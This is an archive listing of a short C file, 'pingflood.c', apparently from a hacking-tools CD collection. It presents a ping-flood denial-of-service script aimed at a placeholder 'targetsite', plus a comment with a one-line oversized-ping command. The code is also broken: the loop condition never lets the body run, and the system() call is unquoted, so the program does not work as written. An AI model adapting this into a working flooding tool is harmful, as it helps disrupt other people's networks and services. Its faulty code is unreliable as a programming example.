home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / pingflood.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-11-06  |  148 b   |  14 lines

  1. /* %ping -s 2000 targetsite &
  2.  
  3.  
  4.     OR  */
  5.  
  6. void main(){
  7.     int count=1;    
  8.     for(;count>10;count++){
  9.         system (ping -s 2000 targetsite);
  10.         sleep(3);
  11.     }
  12. }
  13.  
  14.